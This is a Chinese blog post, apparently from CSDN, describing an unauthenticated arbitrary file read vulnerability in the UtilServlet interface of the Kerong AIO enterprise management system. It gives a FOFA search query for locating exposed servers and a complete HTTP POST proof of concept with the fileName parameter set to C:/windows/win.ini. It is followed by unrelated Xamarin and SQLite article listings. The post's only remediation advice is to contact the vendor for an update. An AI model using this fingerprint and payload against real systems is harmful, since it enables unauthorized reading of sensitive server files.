科荣AIO UtilServlet存在任意文件读取漏洞

于 2023-12-28 16:53:58 发布
阅读量649 收藏 6
点赞数 7
分类专栏: 漏洞复现 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/luochen2436/article/details/135273504
版权
文章报道了科荣AIO管理系统UtilServlet接口存在的文件读取漏洞,攻击者可通过构造恶意请求读取敏感文件。建议用户联系厂商更新至最新安全版本以防止风险。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文章目录

产品简介

科荣AIO是一款企业管理软件,提供企业一体化管理解决方案。它整合了ERP(如进销存、财务管理)、OA(办公自动化)、CRM(客户关系管理)、UDP(自定义平台),并集成了电子商务平台、支付平台等功能

漏洞概述

科荣AIO管理系统UtilServlet 接口存在文件读取漏洞,攻击者可以通过未经授权的访问,构造恶意请求并读取系统中的敏感文件。

指纹识别

fofa:

body="changeAccount('8000')"

漏洞利用

poc:

POST /UtilServlet HTTP/1.1
Host: 
Upgrade-Insecure-Requests: 1
sec-ch-ua-mobile: ?0
Cache-Control: no-cache
Pragma: no-cache
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
sec-ch-ua: "Google Chrome";v="118", "Chromium";v="118", "Not=A?Brand";v="24"
sec-ch-ua-platform: "Windows"
Accept-Language: zh-CN,zh;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0
 
operation=readErrorExcel&fileName=C:/windows/win.ini

在这里插入图片描述

修复建议

联系软件厂商更新至最新安全版本

【有些事总是姗姗来迟,有些人总是匆匆离去。】

XamarinSQLite教程Xamarin.iOS项目定位数据库文件
大学霸__IT达人
08-24 308
XamarinSQLite教程Xamarin.iOS项目定位数据库文件 开发者可以在指定的路径中找到复制的数据库文件,具体的操作步骤如下: (1)单击Mac电脑中Finder菜单中的“前往”|“前往文件夹…”命令,弹出前往文件夹对话框,如图1.27所示。 (2)将输出的路径复制到前往文件夹对话框中的文本框中,单击“前往”按钮,就可以前往到指定的文件夹,如图1.28所示。  ...
xamarin SQLite路径
weixin_30412167的博客
08-09 148
xamarin使用SQLite时对应的访问路径各个平台不一样,需要单独引用。在使用前添加SQLite引用包,在解决方案上右击选择解决方案的Nuget管理选项,在浏览中输入sqlite-net-pcl,选择sqlite-net-pcl这个安装好就可以了,请认准安装包,不要装错了,有很多类似的包,但是不是同一个人写的。 下面各平台罗列代码: Windows8.1: public SQLite...
sql server 2008 r2 无法定位数据库文件目录
Wyb19657108211的博客
05-21 2922
像这样,选择数据库文件时, 无法定位文件夹目录,子目录下的都不显示。明明选择的这个文件夹里还有很多子文件夹,却显示不了。 解决方法: 在此文件夹上右击,属性-安全 添加红框中的用户就可以了。 转载于:https://www.cnblogs.com/sunyf/p/6884915.html...
解决Xamarin Android SQLite示例问题的分享
这个示例项目名称**XamarinSqlite_Demo**表明它是一个演示如何在Xamarin.Android应用中使用SQLite的例子。根据标题和描述,这个项目在解决了一些问题后,已经可以正常工作。 1. **示例功能**:虽然文件名没有提供...
xamarinAndroidSQLite例子
12-22
通过这个"XamarinSqlite_Demo"项目,我们可以学习如何在Xamarin.Android应用中创建、读取、更新和删除SQLite数据库的数据,理解数据库操作的生命周期,并掌握数据库性能优化的基本原则。这对于构建数据驱动的应用...
xamarin.form 踩坑-本地视频播放_缩略图列表+播放界面_01
yangzheng0809的专栏
03-17 5765
一、需求:录制视频,缩略图列表展示,点击列表进行播放。 二、视频播放的探索: 1、MediaManager插件:
Xamarin Android (VS2019)之 Sqlite 数据库使用
蓝创精英团队
06-06 1043
Sqlite数据库 挺好用的,也不用其他权限,默认存储在内部存储的位置。 需要引用的包 [Table("Info")] public class Info { [PrimaryKey, AutoIncrement, Column("Id")] public int Id { get; set; } [MaxLength(20)] public string Contet { get; set; } }.
Xamarin.android的Sqlite数据库原来是这么用的?
rztyfx的专栏
08-13 798
初次接触Xamarin.android,尝试开发一个APK,其实入门的教程在微软官方有一大部分,不过关于数据库这块还是看得不知所云 android自带sqlite数据库模块,但是这个引用Visual Studio 2019中好像是没有的(还是我没找到?) NuGet中下载Mono.Data.Sqlite.Portable安装即可 本来以为很简单的操作,其实不然,下面写个类连接数据库: public class clsSqlite { private SqliteConnec
vs2017 xamarin使用本地sqlite数据库源码
07-12
在vs2017下 使用xamarin android 开发手机本地数据库sqlite DEMO源码
使用Xamarin + C#开发应用 -- 使用sqlite做本地存储
我的英文站点:https://iorilan.medium.com/
05-06 3215
使用Xamarin + C#开发应用 -- 使用sqlite做本地存储
python 提取固定列名数据_python获取数据库列名
weixin_39806288的博客
12-01 6128
{"moduleinfo":{"card_count":[{"count_phone":1,"count":1}],"search_count":[{"count_phone":4,"count":4}]},"card":[{"des":"阿里云数据库专家保驾护航,为用户的数据库应用系统进行性能和风险评估,参与配合进行数据压测演练,提供数据库优化方面专业建议,在业务高峰期与用户共同保障数据库系统平...
PC微信逆向:两种姿势教你解密数据库文件
热门推荐
鬼手的博客
07-20 8万+
文章目录定位数据库文件密码定位数据库密钥的思路获取数据库密钥的实战分析CreateFileW断点常见错误排查堆栈排查堆栈地址单步跟踪用代码实现解密数据库编译选项解密代码实际效果动态获取数据库密钥定位数据库文件句柄关于微信数据库句柄获取微信数据库句柄的思路定位微信的数据库句柄 定位数据库文件密码 微信的数据库使用的是sqlite3,数据库文件在C:\Users\XXX\Documents\WeCha...
SMO学习笔记(五)——附加数据库
weixin_33752045的博客
10-06 142
SQL Server Management Studio演示附加数据库: 1.选择数据库附加操作     2.选择附加按钮后会出现如下界面,然后点击添加按钮。     3.定位数据库文件,选择你分离或备份的数据库,点确定。     4.添加。     添加完毕!注意如果数据库已经存在或重名,附加数据库操作将失败! SMO附加数据库代码如下:   /// <...
【MySQL:查看自己数据库文件所在的位置】附:互联网大厂 数据库面试题:简述索引的作用,以及常见的索引类型和优缺点;MySQL的事务隔离级别有哪些?请分别说明各个隔离级别的特点以及可能出现的问题。
追光者♂:记录、分享、总结、提升,现象级专栏《Python从入门到人工智能》作者,无惧黑暗,坚信曙光
03-09 1万+
本篇文章较为详细地讲解了如何查找mysql数据库真实物理文件的存储位置,只要我们直接复制数据库文件,即可对数据库进行搬迁,也可以对数据库文件的存放位置进行改变。 方法如下: 第1步: 打开 mysqml 文件夹,显示的文件如下,然后找到 my.ini 文件,如图所示。 第2步: 选中 my.ini 文件,这时候点击鼠标右键依次选择”打开方式“然后选择”记事本打开“。如图。 第3步: 以记事本的方式打开 my.ini 文件后,按 ctrl+f 搜索 ”datadir“ 就可以找到你数据库
xamarin学习笔记A10(安卓SQLite)
junshangshui的专栏
08-11 965
(每次学习一点xamarin就做个学习笔记和视频来加深记忆巩固知识) 如有不正确的地方,请帮我指正。 SQLite简介 SQLite是一个关系型的数据库,支持标准SQL语法,它是内置在安卓系统中的。创建数据库和表 安卓提供了一个抽像类SQLiteOpenHelper来建库和表,所以得新建一个类去继承它并重写OnCreate()和OnUpgrade()方法,还得提供抽像类构造方
xamarin和mysql_Xamarin.Android之SQLite.NET ORM
weixin_34442215的博客
02-05 173
一、前言通过《Xamarin.Android之SQLiteOpenHelper》和《Xamarin.Android之ContentProvider》的学习,我们已经掌握了如何使用特定于该平台的数据库操作。但是这样却和Xamarin所宣称的跨平台相违背了,因为这样我们就需要针对不同的平台编写不同的代码,而本章将使用Github上的开源项目SQLite.NET去解决这个问题,从而可以实现跨平台,减少代...
Xamarin.Android项目中MVVMCross和SQLite连接的实现示例
4. **示例**: 在这个上下文中,“示例”很可能指的是一个具体的代码样本或者项目,该项目演示了如何在Xamarin.Android项目中应用MVVMCross框架,并且展示了如何建立sqlite数据库连接。 5. **sqlite连接**: sqlite是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值